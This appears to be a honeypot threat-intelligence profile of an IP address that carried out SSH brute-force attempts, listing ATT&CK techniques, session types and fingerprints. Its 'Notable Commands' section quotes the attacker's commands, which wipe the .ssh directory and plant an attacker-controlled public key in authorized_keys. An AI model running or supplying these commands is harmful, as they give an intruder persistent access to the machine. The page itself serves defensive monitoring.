IntrusionLabs IntrusionLabs
← Back to feed

195.199.210.194

Threat Confidence
47%
Location
🇭🇺 HU / Gyöngyös
ASN
AS1955 · KIFU (Governmental Info Tech Development Agency)
Cloud Provider
Total Events
341
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-08 00:08 — 2026-04-08 00:52
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Command and Control
T1105
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
malware_dropper ×12 credential_harvester ×25 opportunistic_bruter ×12
Sessions
49 (24 with login)
Avg Depth Score
0.55
Commands Executed
36
Files Downloaded
12
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 16cf429c7332 w4m_seattle_01 · 2026-04-08 00:52
1 50%
Loading events...
Malware Dropper 6e37e6dac4d9 w4m_seattle_01 · 2026-04-08 00:52
3 1 1 100%
Loading events...
Credential Harvester 9dd8ddbed758 w4m_seattle_01 · 2026-04-08 00:52
1 35%
Loading events...
Credential Harvester c143e52e792c w4m_seattle_01 · 2026-04-08 00:51
1 35%
Loading events...
Credential Harvester 6fe470357280 w4m_seattle_01 · 2026-04-08 00:49
1 35%
Loading events...
Opportunistic Bruter a0f916ab61d5 w4m_seattle_01 · 2026-04-08 00:47
1 50%
Loading events...
Malware Dropper 83903937deb1 w4m_seattle_01 · 2026-04-08 00:47
3 1 1 100%
Loading events...
Credential Harvester 2943afec215c w4m_seattle_01 · 2026-04-08 00:47
1 35%
Loading events...
Malware Dropper 378c75077c3d w4m_seattle_01 · 2026-04-08 00:45
3 1 1 100%
Loading events...
Opportunistic Bruter 022b23b9012b w4m_seattle_01 · 2026-04-08 00:45
1 50%
Loading events...
Credential Harvester 51aac8d23a10 w4m_seattle_01 · 2026-04-08 00:45
1 35%
Loading events...
Credential Harvester ec6ac79d4050 w4m_seattle_01 · 2026-04-08 00:44
1 35%
Loading events...
Opportunistic Bruter 3450e2c218b8 w4m_seattle_01 · 2026-04-08 00:42
1 50%
Loading events...
Malware Dropper 40be93bb457c w4m_seattle_01 · 2026-04-08 00:42
3 1 1 100%
Loading events...
Credential Harvester 46e142b2eb1e w4m_seattle_01 · 2026-04-08 00:42
1 35%
Loading events...
Opportunistic Bruter 9b25e6e0a3eb w4m_seattle_01 · 2026-04-08 00:40
1 50%
Loading events...
Malware Dropper a846d01c7627 w4m_seattle_01 · 2026-04-08 00:40
3 1 1 100%
Loading events...
Credential Harvester 9c68ad8c3393 w4m_seattle_01 · 2026-04-08 00:40
1 35%
Loading events...
Opportunistic Bruter 92b406143920 w4m_seattle_01 · 2026-04-08 00:39
1 50%
Loading events...
Malware Dropper c8c5af2723bf w4m_seattle_01 · 2026-04-08 00:38
3 1 1 100%
Loading events...
Credential Harvester 97fb0a2c076c w4m_seattle_01 · 2026-04-08 00:39
1 35%
Loading events...
Opportunistic Bruter a39ff51a45a9 w4m_seattle_01 · 2026-04-08 00:37
1 50%
Loading events...
Malware Dropper 8017ebbb2b07 w4m_seattle_01 · 2026-04-08 00:37
3 1 1 100%
Loading events...
Credential Harvester 56144f5c4eff w4m_seattle_01 · 2026-04-08 00:37
1 35%
Loading events...
Credential Harvester 9ed193e9884b w4m_seattle_01 · 2026-04-08 00:35
1 35%
Loading events...
Credential Harvester fe881e56cda2 w4m_seattle_01 · 2026-04-08 00:33
1 35%
Loading events...
Malware Dropper 1a336d5b7f46 w4m_seattle_01 · 2026-04-08 00:31
3 1 1 100%
Loading events...
Opportunistic Bruter 402220f42d60 w4m_seattle_01 · 2026-04-08 00:32
1 50%
Loading events...
Credential Harvester d15311103517 w4m_seattle_01 · 2026-04-08 00:31
1 35%
Loading events...
Opportunistic Bruter 80f1e76a4957 w4m_seattle_01 · 2026-04-08 00:30
1 50%
Loading events...
Malware Dropper 8e967cd76f5c w4m_seattle_01 · 2026-04-08 00:30
3 1 1 100%
Loading events...
Credential Harvester e38ad831856e w4m_seattle_01 · 2026-04-08 00:30
1 35%
Loading events...
Credential Harvester d8d027ef9692 w4m_seattle_01 · 2026-04-08 00:28
1 35%
Loading events...
Credential Harvester e1ef58283fb8 w4m_seattle_01 · 2026-04-08 00:26
1 35%
Loading events...
Credential Harvester 1897582838db w4m_seattle_01 · 2026-04-08 00:25
1 35%
Loading events...
Credential Harvester a976af25b0a8 w4m_seattle_01 · 2026-04-08 00:23
1 35%
Loading events...
Credential Harvester 99f54d217684 w4m_seattle_01 · 2026-04-08 00:21
1 35%
Loading events...
Opportunistic Bruter 90c920eea688 w4m_seattle_01 · 2026-04-08 00:19
1 50%
Loading events...
Malware Dropper e34c7fb34c34 w4m_seattle_01 · 2026-04-08 00:19
3 1 1 100%
Loading events...
Credential Harvester 9e51f03570e2 w4m_seattle_01 · 2026-04-08 00:19
1 35%
Loading events...
Credential Harvester a06f6f33467d w4m_seattle_01 · 2026-04-08 00:18
1 35%
Loading events...
Opportunistic Bruter 8ac5910d6427 w4m_seattle_01 · 2026-04-08 00:16
1 50%
Loading events...
Malware Dropper c2aa30a24797 w4m_seattle_01 · 2026-04-08 00:16
3 1 1 100%
Loading events...
Credential Harvester a03c13cc989d w4m_seattle_01 · 2026-04-08 00:16
1 35%
Loading events...
Credential Harvester 17b8893f4b2e w4m_seattle_01 · 2026-04-08 00:14
1 35%
Loading events...
Malware Dropper 9ec76589dea4 w4m_seattle_01 · 2026-04-08 00:13
3 1 1 100%
Loading events...
Opportunistic Bruter b8eee5329db3 w4m_seattle_01 · 2026-04-08 00:13
1 50%
Loading events...
Credential Harvester 13380eabbbc2 w4m_seattle_01 · 2026-04-08 00:13
1 35%
Loading events...
Credential Harvester 21385d36b523 w4m_seattle_01 · 2026-04-08 00:08
1 35%
Loading events...